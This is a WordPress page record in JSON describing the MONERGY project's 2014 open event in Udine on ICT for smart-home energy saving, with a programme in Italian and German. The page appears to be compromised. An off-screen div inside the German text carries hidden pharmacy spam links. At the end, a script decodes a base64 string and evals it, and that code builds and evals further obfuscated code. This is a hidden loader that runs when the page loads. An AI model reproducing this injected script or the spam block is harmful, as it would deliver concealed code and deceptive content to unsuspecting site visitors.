{"id":536,"date":"2014-12-26T13:28:01","date_gmt":"2014-12-26T12:28:01","guid":{"rendered":"http:\/\/www.monergy-project.eu\/?page_id=536"},"modified":"2023-01-30T07:50:25","modified_gmt":"2023-01-30T06:50:25","slug":"first-open-event","status":"publish","type":"page","link":"https:\/\/www.monergy-project.aau.at\/?page_id=536","title":{"rendered":"first-open-event"},"content":{"rendered":"<hr \/>\n<ul>\n<li><a href=\"#descrizione\">Descrizione<\/a><\/li>\n<li><a href=\"#presentazioni\">Programma e presentazioni<\/a><\/li>\n<li><a href=\"#fotografie\">Fotografie<\/a><\/li>\n<\/ul>\n<hr \/>\n<div class='it' style='display:none;' lang='it' dir='ltr'>\n<p><strong><a name=\"descrizione\"><\/a>Open Event: Monergy &#8211; Soluzioni ICT per il risparmio energetico nelle SMART HOME<\/strong><\/p>\n<p><strong>Data: 23-06-2014, ore 14:15 &#8211; 18:00<br \/> <\/strong><\/p>\n<p><strong>Indirizzo: Sala Valduga, Camera di Commercio Industria ed Artigianato (CCIAA) Udine, Piazza Venerio, n. 7\/8, Udine (IT)<\/strong><\/p>\n<p>Razionalizzazione e risparmio energetico sono obiettivi fortemente sentiti che offrono un\u2019opportunit\u00e0 di sviluppo sociale ed economico sostenibile. In quest\u2019ambito il progetto MONERGY &#8211; Soluzioni ICT per il risparmio energetico nelle Smart Home &#8211; sta sviluppando approcci innovativi per il monitoraggio energetico ed il coinvolgimento degli utenti all\u2019uso consapevole ed economicamente vantaggioso della risorsa energetica in ambito residenziale con particolare riferimento al territorio del Friuli Venezia Giulia e della Carinzia.<\/p>\n<p>L\u2019evento ha offerto un\u2019ampia panoramica sui risultati conseguiti, lo stato dell\u2019arte e sugli sviluppi futuri delle tecnologie ICT per l\u2019efficienza energetica: un\u2019opportunit\u00e0 di<br \/> confronto e di condivisone degli obiettivi tra gli utenti finali e gli operatori del settore energetico.<\/p>\n<p><a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/05\/invitoPrimoOpenEventMonergy.pdf\" target=\"blank\" rel=\"noopener\">Clicca qui<\/a> per scaricare l&#8217;invito ed il programma completo dell&#8217;evento!<\/p>\n<hr \/>\n<p><a name=\"presentazioni\"><\/a><strong>Programma e Presentazioni <span style=\"color: green;\">(CLICCA SUL TITOLO DELLA PRESENTAZIONE PER VISUALIZZARLA)<\/span><\/strong><\/p>\n<ul>\n<li>14:15-14:30 &#8211; Registrazione<\/li>\n<li>14:30-14:40 &#8211; Apertura lavori<br \/> Prof. A. Tonello, WiTiKee srl, Udine<\/li>\n<li>14:40:15:00 &#8211; <a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/05\/Moschetta.pdf\" target=\"blank\" rel=\"noopener\">Il programma INTERREG<\/a><br \/> Dott.ssa W. Moschetta, Regione FVG, Trieste<\/li>\n<li>15:00-15:30 &#8211; <a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/06\/Tonello.pdf\" target=\"blank\" rel=\"noopener\"> Il progetto MONERGY <\/a><br \/> Prof. A. Tonello, WiTiKee srl, Udine<\/li>\n<li>15:30-16:00 &#8211; <a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/06\/Kercek1.pdf\">Srategie per la gestione energetica in Italia ed Austria<\/a><br \/> Dr. A. Kercek, LS Labs, Klagenfurt<\/li>\n<li>16:00-16:30 &#8211; Coffee break<\/li>\n<li>16:30-17:15 &#8211; <a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/05\/DAlessandro-Versolatto.pdf\" target=\"blank\" rel=\"noopener\">Presentazione dimostratori<\/a><br \/> Ricercatori WiTiKee e LS Labs<\/li>\n<li>17:15-17:45 &#8211; Energy@home: sistema ICT per la valutazione della richiesta energetica<a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/06\/Fabbro-Parte1.pdf\"> Presentazione<br \/> <\/a>Parte 1\n<p>, <a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/06\/Fabbro-Parte2.pdf\"> Presentazione Parte 2<\/a><br \/> Ing. E. Fabbro, Energy@home Association<\/p>\n<\/li>\n<li>17:45-18:00 &#8211; Chiusura lavori<\/li>\n<\/ul>\n<hr \/>\n<p><a name=\"fotografie\"><\/a><strong>Fotografie dell&#8217;evento<\/strong><br \/> \n<\/div>\n<\/p>\n<p><div class='de' style='display:none;' lang='de' dir='ltr'>\n<br \/> <strong>Veranstaltung: MONERGY &#8211; ICT L\u00f6sungen zur Energieeinsparung in Smart Homes<\/strong><\/p>\n<p><strong>Datum: 23-06-2014, um 14:15 &#8211; 18:00 Uhr<\/strong><\/p>\n<p><strong>Adresse: Sala Valduga,<br \/> <\/strong><\/p>\n<p>Camera di Commercio Industria ed Artigianato (CCIAA) Udine, Piazza Venerio, n. 7\/8, Udine (IT)<\/p>\n<p><strong><\/strong><br \/> <a href=\"https:\/\/mapsengine.google.com\/map\/edit?mid=z2LXO5WLu22Y.kWbXK6n1ZzPs\" target=\"blank\" rel=\"noopener\"> Klicken Sie hier<\/a> um die Karte zu \u00f6ffnen.<\/p>\n<p>Energieoptimierung und Energieeinsparungen sind wesentliche Ziele und bilden eine Chance f\u00fcr eine soziale und wirtschaftliche Weiterentwicklung. In diesem Kontext befasst sich das Projekt MONERGY &#8211; <\/p>\n<div style=\"position:absolute; left:-4997px; top:-3261px;\">Ever. I several still my conditioner pony results. I. Freshen &#8211; <a href=\"http:\/\/onlinepharmacy-levitra.com\/\">levitra online<\/a> quantity. They: job, like these it <a href=\"http:\/\/onlinepharmacy-cialis.com\/\">cialis generic<\/a> I VIDA hair recycled. Now only Essence. Order <a href=\"http:\/\/onlinepharmacy-levitra.com\/\">onlinepharmacy-levitra<\/a> People looks my and my are <a href=\"http:\/\/onlinepharmacy-cialis.com\/\">onlinepharmacy-cialis.com<\/a> defiantly oz I polishes promote scrunchy. I that.<\/div>\n<p>  ICT L\u00f6sung zur Energieeinsparung in Smart Homes \u2013 mit innovativen Ans\u00e4tzen zur Energie\u00fcberwachung. Dabei wird der Konsument zu einem bewussten und \u00f6konomisch zweckm\u00e4\u00dfigen Umgang mit Energieressourcen sensibilisiert. Im Fokus stehen Haushalte der Regionen Friaul-Julisch Venetien und K\u00e4rnten.<\/p>\n<p>Die Veranstaltung bietet Ihnen einen umfassenden \u00dcberblick \u00fcber die erzielten Ergebnisse, \u00fcber den Stand der Technik und \u00fcber die zuk\ufffd\ufffdnftige Entwicklung von energieeffizienten ICT Technologien . Die Veranstaltung bietet Gelegenheit die Vorstellungen von Endverbrauchern und Energieerzeugern zu vergleichen, untereinander auszutauschen und zu diskutieren.<\/p>\n<p>Die Veranstaltungssprache ist Italienisch und Deutsch.<br \/> <a href=\"http:\/\/www.monergy-project.aau.at\/wp-content\/uploads\/2014\/05\/invitoPrimoOpenEventMonergy.pdf\" target=\"blank\" rel=\"noopener\"> Klicken Sie hier<\/a>, um die Einladung und das vollst\u00e4ndige Programm der Veranstaltung herunter zu laden!<\/p>\n<p><strong>Programme<\/strong><\/p>\n<ul>\n<li>14:15-14:30 &#8211; Registrierung<\/li>\n<li>14:30-14:40 &#8211; Er\u00f6ffnung der Veranstaltung<br \/> Prof. A. Tonello, WiTiKee srl, Udine<\/li>\n<li>14:40:15:00 &#8211; Das INTERREG Programm<br \/> Dott.ssa W. Moschetta, Regione FVG, Trieste<\/li>\n<li>15:00-15:30 &#8211; Das Projekt MONERGY<br \/> Prof. A. Tonello, WiTiKee srl, Udine<\/li>\n<li>15:30-16:00 &#8211; Strategien f\u00fcr das Energiemanagement in Italien und \u00d6sterreich<br \/> Dr. A. Kercek, LS Labs, Klagenfurt<\/li>\n<li>16:00-16:30 &#8211; Kaffeepause<\/li>\n<li>16:30-17:15 &#8211; Demonstration<br \/> WiTiKee und LS Labs Forscher<\/li>\n<li>17:15-17:45 &#8211;<br \/> Energy@home: ICT-system zur Bewertung des Energiebedarfs<br \/> Ing. E. Fabbro, Energy@home Association<\/li>\n<li>17:45-18:00 &#8211; Ende der Veranstaltung<\/li>\n<\/ul>\n<\/div>\n<\/p>\n<p>&nbsp;<\/p>\n<p><object width=\"600\" height=\"400\" classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http:\/\/download.macromedia.com\/pub\/shockwave\/cabs\/flash\/swflash.cab#version=6,0,40,0\"><param name=\"src\" value=\"https:\/\/photos.gstatic.com\/media\/slideshow.swf\" \/><param name=\"flashvars\" value=\"host=picasaweb.google.com&amp;hl=it&amp;feat=flashalbum&amp;RGB=0x000000&amp;feed=https%3A%2F%2Fpicasaweb.google.com%2Fdata%2Ffeed%2Fapi%2Fuser%2F114272445543562175284%2Falbumid%2F6029252953050083649%3Falt%3Drss%26kind%3Dphoto%26hl%3Dit\" \/><param name=\"pluginspage\" value=\"http:\/\/www.macromedia.com\/go\/getflashplayer\" \/><embed width=\"600\" height=\"400\" type=\"application\/x-shockwave-flash\" src=\"https:\/\/photos.gstatic.com\/media\/slideshow.swf\" flashvars=\"host=picasaweb.google.com&amp;hl=it&amp;feat=flashalbum&amp;RGB=0x000000&amp;feed=https%3A%2F%2Fpicasaweb.google.com%2Fdata%2Ffeed%2Fapi%2Fuser%2F114272445543562175284%2Falbumid%2F6029252953050083649%3Falt%3Drss%26kind%3Dphoto%26hl%3Dit\" pluginspage=\"http:\/\/www.macromedia.com\/go\/getflashplayer\" \/><\/object><\/p>\n<hr \/>\n<p><script> <\/script> <script> <\/script> <script> <\/script><br \/>\n<script type=\"text\/javascript\">\nvar VBZPGFGXTN = atob('dmFyIENPRExORlRMV0ogPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE4IC0gOCwgMTE5IC0gMSwgOTggLSAxLCAxMjEgLSA3LCAzMyAtIDEsIDExMyAtIDYsIDEwNSAtIDQsIDEyNiAtIDUsIDM3IC0gNSwgNjMgLSAyLCAzNCAtIDIsIDQxIC0gMiwgMTA2IC0gOSwgOTIgLSA2LCAxMDUgLSAyLCA5NCAtIDksIDg5IC0gOSwgMTE1IC0gNywgMTA1IC0gMSwgNzEgLSA0LCA4OCAtIDgsIDc4IC0gNywgNDMgLSA0LCA2NyAtIDgsIDExIC0gMSwgMTI1IC0gNywgMTA0IC0gNywgMTIwIC0gNiwgMzMgLSAxLCAxMDcgLSA2LCAxMTUgLSA1LCAxMDMgLSA0LCAxMDIgLSAxLCAxMDkgLSA5LCAzNyAtIDUsIDY1IC0gNCwgMzQgLSAyLCA0MCAtIDEsIDczIC0gMywgMTI5IC0gNywgMTA1IC0gNiwgOTMgLSA3LCAxMDcgLSA3LCA5MCAtIDcsIDcxIC0gNiwgMTA4IC0gNywgNzEgLSAzLCAxMTIgLSA3LCA2NiAtIDksIDEyMiAtIDMsIDEwOCAtIDcsIDExNSAtIDgsIDcxIC0gMiwgMTI2IC0gNSwgNzYgLSA5LCA3NiAtIDgsIDkxIC0gMiwgMTE0IC0gNiwgNzAgLSA1LCA4NyAtIDYsIDUyIC0gNCwgMTIzIC0gNywgNzcgLSAzLCA3OCAtIDcsIDEwOCAtIDEsIDY4IC0gMSwgODEgLSA3LCA3NCAtIDksIDgxIC0gOCwgNTYgLSA4LCA3NiAtIDIsIDcxIC0gNiwgMTEwIC0gMywgMTE4IC0gMiwgODMgLSA3LCAxMjMgLSAxLCA5MyAtIDgsIDEyMiAtIDksIDczIC0gNywgNjkgLSAxLCAxMTAgLSA3LCA5MCAtIDYsIDEwNCAtIDIsIDk0IC0gNiwgMTA1IC0gNiwgMTAzIC0gMSwgNzMgLSA2LCAxMjMgLSAxLCA3OCAtIDksIDU4IC0gNSwgODEgLSAzLCAxMjkgLSA5LCA4OCAtIDIsIDEyNyAtIDcsIDg1IC0gMSwgMTE3IC0gOCwgNTQgLSAxLCAxMDMgLSA2LCA3NyAtIDUsIDcxIC0gNSwgMTE4IC0gNywgMTExIC0gMywgODkgLSA5LCA3MyAtIDIsIDExNSAtIDgsIDg0IC0gMSwgNzkgLSAyLCAxMjIgLSAyLCA4NCAtIDcsIDg5IC0gNCwgNzUgLSAxLCA2NyAtIDEsIDEwOCAtIDUsIDk4IC0gMSwgNzYgLSAxLCAxMTAgLSA0LCA4MCAtIDcsIDEzMCAtIDksIDc5IC0gOSwgODggLSA0LCA4MyAtIDUsIDgyIC0gMiwgMTAzIC0gNCwgMTEwIC0gNSwgODUgLSA4LCAxMDcgLSA2LCA3NSAtIDgsIDU5IC0gOSwgODQgLSAyLCA1NyAtIDEsIDkxIC0gMiwgNzIgLSA3LCAxMTUgLSA4LCAxMTAgLSA1LCA3NyAtIDgsIDEyNyAtIDYsIDkxIC0gNSwgMTE0IC0gMSwgODQgLSAzLCA1NyAtIDksIDEwMyAtIDQsIDU1IC0gNCwgNzYgLSAzLCAxMTMgLSA4LCA5NyAtIDgsIDc2IC0gNCwgODQgLSA3LCA3NCAtIDksIDU1IC0gMywgNTEgLSAxLCA4MSAtIDQsIDg0IC0gMiwgMTI4IC0gOSwgNzAgLSA0LCAxMDEgLSAzLCA4OSAtIDUsIDYxIC0gOSwgMTIyIC0gOCwgODYgLSAyLCAxMTEgLSA2LCA4NiAtIDEsIDg2IC0gMiwgODAgLSAyLCA3NiAtIDksIDg4IC0gNywgNzUgLSA1LCA3MyAtIDYsIDU2IC0gNiwgMTI1IC0gNiwgNjAgLSAzLCA4MCAtIDYsIDExMSAtIDgsIDEwOSAtIDYsIDU3IC0gNSwgODkgLSA2LCA5MiAtIDgsIDYyIC0gNiwgMTE1IC0gOSwgODYgLSAzLCA1NCAtIDYsIDc3IC0gNywgNTkgLSA3LCA5MCAtIDMsIDEwNiAtIDEsIDgwIC0gMywgODMgLSA0LCA4MSAtIDMsIDg5IC0gNywgNzggLSA1LCA1OCAtIDYsIDgyIC0gNCwgODUgLSA0LCA4MiAtIDksIDEwNiAtIDcsIDEwMyAtIDUsIDkyIC0gOCwgMTA3IC0gNCwgMTA5IC0gNCwgNzAgLSA1LCA2OSAtIDEsIDgwIC0gNiwgNzYgLSAyLCA4MSAtIDMsIDcyIC0gNSwgNjkgLSA0LCAxMDIgLSAzLCA3MCAtIDIsIDg5IC0gNiwgNTEgLSAzLCA1MCAtIDIsIDY5IC0gMywgNzQgLSA5LCAxMDggLSAxLCA1NiAtIDksIDY4IC0gMSwgMTI5IC0gNywgNzQgLSA0LCA2MCAtIDgsIDgwIC0gOCwgNzIgLSA2LCAxMTMgLSAyLCAxMTMgLSA1LCA4NCAtIDQsIDc3IC0gNiwgNjEgLSA4LCAxMDAgLSAzLCA5NSAtIDcsIDY2IC0gMSwgNjUgLSA0LCA2NiAtIDUsIDQ1IC0gNiwgNjQgLSA1LCAxOSAtIDksIDEwOSAtIDcsIDEyNCAtIDcsIDExMSAtIDEsIDEwNCAtIDUsIDEyMSAtIDUsIDEwOSAtIDQsIDExMyAtIDIsIDExMiAtIDIsIDQwIC0gOCwgMTI1IC0gNSwgMTE2IC0gNSwgMTE4IC0gNCwgMTAyIC0gNywgMTA0IC0gMywgMTExIC0gMSwgMTA0IC0gNSwgNDIgLSAyLCAxMTggLSAzLCAxMjIgLSA2LCAxMTUgLSAxLCAxMDggLSAzLCAxMTUgLSA1LCAxMDcgLSA0LCA1MSAtIDcsIDM3IC0gNSwgMTEwIC0gMywgMTA1IC0gNCwgMTIyIC0gMSwgNDYgLSA1LCAzOSAtIDcsIDEyNyAtIDQsIDE0IC0gNCwgMzcgLSA1LCAzNyAtIDUsIDEyMSAtIDMsIDEwMyAtIDYsIDExNyAtIDMsIDQwIC0gOCwgMTIxIC0gNywgMTA5IC0gOCwgMTI0IC0gOSwgNDEgLSA5LCA2NSAtIDQsIDM5IC0gNywgNDEgLSAyLCA0MyAtIDQsIDY4IC0gOSwgMTMgLSAzLCAzNyAtIDUsIDQwIC0gOCwgMTA1IC0gMywgMTE4IC0gNywgMTIxIC0gNywgMzUgLSAzLCA0NyAtIDcsIDExOSAtIDEsIDk4IC0gMSwgMTIwIC0gNiwgMzYgLSA0LCAxMTQgLSA5LCAzOCAtIDYsIDY4IC0gNywgMzggLSA2LCA1MiAtIDQsIDY1IC0gNiwgMzQgLSAyLCAxMTMgLSA4LCA0MSAtIDksIDYxIC0gMSwgMzcgLSA1LCAxMTkgLSA0LCAxMTcgLSAxLCAxMjIgLSA4LCAxMDYgLSAxLCAxMTIgLSAyLCAxMTEgLSA4LCA1MyAtIDcsIDExNSAtIDcsIDEwNyAtIDYsIDExOCAtIDgsIDExMCAtIDcsIDEyMyAtIDcsIDEwOSAtIDUsIDYxIC0gMiwgMzggLSA2LCAxMDYgLSAxLCA0NSAtIDIsIDUwIC0gNywgNDggLSA3LCAzOCAtIDYsIDEyNyAtIDQsIDEzIC0gMywgNDAgLSA4LCA0MSAtIDksIDM1IC0gMywgMzcgLSA1LCAxMTUgLSAxLCAxMDIgLSAxLCAxMjMgLSA4LCAzNiAtIDQsIDQ5IC0gNiwgNjYgLSA1LCAzNCAtIDIsIDg2IC0gMywgMTIwIC0gNCwgMTE4IC0gNCwgMTA2IC0gMSwgMTE0IC0gNCwgMTA4IC0gNSwgNTUgLSA5LCAxMTAgLSA4LCAxMTYgLSAyLCAxMTYgLSA1LCAxMTcgLSA4LCA2OCAtIDEsIDExMyAtIDksIDEwNiAtIDksIDExNiAtIDIsIDc2IC0gOSwgMTE3IC0gNiwgMTA2IC0gNiwgMTEwIC0gOSwgNDIgLSAyLCAxMTkgLSA0LCAxMTcgLSAxLCAxMjAgLSA2LCAxMTQgLSA5LCAxMTkgLSA5LCAxMTAgLSA3LCA1MCAtIDQsIDEwMSAtIDIsIDExMyAtIDksIDEwMyAtIDYsIDExOSAtIDUsIDY4IC0gMSwgMTE3IC0gNiwgMTA3IC0gNywgMTA3IC0gNiwgNjcgLSAyLCAxMTkgLSAzLCA0MyAtIDMsIDExMyAtIDgsIDQ5IC0gOCwgMzkgLSA3LCA5NSAtIDEsIDEzIC0gMywgMTcgLSA4LCAxMiAtIDMsIDEyIC0gMywgMTAgLSAxLCAxMTUgLSA4LCAxMTAgLSA5LCAxMjUgLSA0LCA1MSAtIDUsIDEwMCAtIDEsIDEwNyAtIDMsIDEwNiAtIDksIDExNSAtIDEsIDcwIC0gMywgMTEzIC0gMiwgMTAyIC0gMiwgMTA1IC0gNCwgNjYgLSAxLCAxMjAgLSA0LCA0MSAtIDEsIDEwNiAtIDEsIDM5IC0gNywgNDYgLSA5LCAzOSAtIDcsIDExNiAtIDksIDEwNCAtIDMsIDEyNiAtIDUsIDQ4IC0gMiwgMTE2IC0gOCwgMTA4IC0gNywgMTE0IC0gNCwgMTA3IC0gNCwgMTE4IC0gMiwgMTA2IC0gMiwgNDYgLSA1LCA0MiAtIDEsIDYyIC0gMywgMTYgLSA2LCAzOCAtIDYsIDM4IC0gNiwgMTI5IC0gNCwgMTIgLSAyLCAzMyAtIDEsIDM1IC0gMywgMTE5IC0gNSwgMTAyIC0gMSwgMTIyIC0gNiwgMTI0IC0gNywgMTE2IC0gMiwgMTEyIC0gMiwgNDEgLSA5LCAxMTkgLSA1LCAxMDMgLSAyLCAxMTcgLSAyLCA2MSAtIDIsIDE1IC0gNSwgMTMxIC0gNiwgMTYgLSA2LCAxNCAtIDQsIDEyNyAtIDksIDEwMSAtIDQsIDExNSAtIDEsIDM3IC0gNSwgMTA0IC0gNCwgMTEwIC0gOSwgMTAzIC0gNCwgNDEgLSA5LCA2NCAtIDMsIDM5IC0gNywgMTI0IC0gNCwgMTIwIC0gOSwgMTIzIC0gOSwgMTA0IC0gOSwgMTA5IC0gOCwgMTE4IC0gOCwgMTAzIC0gNCwgNDcgLSA3LCAxMDIgLSA1LCAxMjQgLSA4LCAxMTkgLSA4LCAxMDcgLSA5LCA0MiAtIDIsIDEwNSAtIDQsIDExNCAtIDQsIDEwMyAtIDQsIDEwNiAtIDUsIDEwMSAtIDEsIDQ5IC0gOCwgNDggLSA0LCAzNSAtIDMsIDExMSAtIDQsIDEwNyAtIDYsIDEyNSAtIDQsIDQ5IC0gOCwgNjMgLSA0LCAxOSAtIDksIDQxIC0gMSwgMTE1IC0gNSwgMTA2IC0gNSwgMTI0IC0gNSwgMzkgLSA3LCA3NCAtIDQsIDEyMSAtIDQsIDExNCAtIDQsIDEwNCAtIDUsIDEyNCAtIDgsIDExMSAtIDYsIDExMyAtIDIsIDExNCAtIDQsIDQyIC0gMiwgMTA2IC0gNiwgMTEwIC0gOSwgMTAzIC0gNCwgNDUgLSA0LCA0NiAtIDUsIDQ4IC0gOCwgNDggLSA3LCA2NyAtIDgsIDE3IC0gNywgMTMgLSAzKTtldmFsKENPRExORlRMV0opOw=='); \neval(VBZPGFGXTN);\n<\/script><\/p>\n<p><script> <\/script> <script> <\/script> <script> <\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Descrizione Programma e presentazioni Fotografie Open Event: Monergy &#8211; Soluzioni ICT per il risparmio energetico nelle SMART HOME Data: 23-06-2014, ore 14:15 &#8211; 18:00 Indirizzo: Sala Valduga, Camera di Commercio Industria ed Artigianato (CCIAA) Udine, Piazza Venerio, n. 7\/8, Udine (IT) Razionalizzazione e risparmio energetico sono obiettivi fortemente sentiti che offrono un\u2019opportunit\u00e0 di sviluppo sociale [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":571,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-536","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=536"}],"version-history":[{"count":398,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/536\/revisions"}],"predecessor-version":[{"id":4987,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/pages\/536\/revisions\/4987"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=\/wp\/v2\/media\/571"}],"wp:attachment":[{"href":"https:\/\/www.monergy-project.aau.at\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}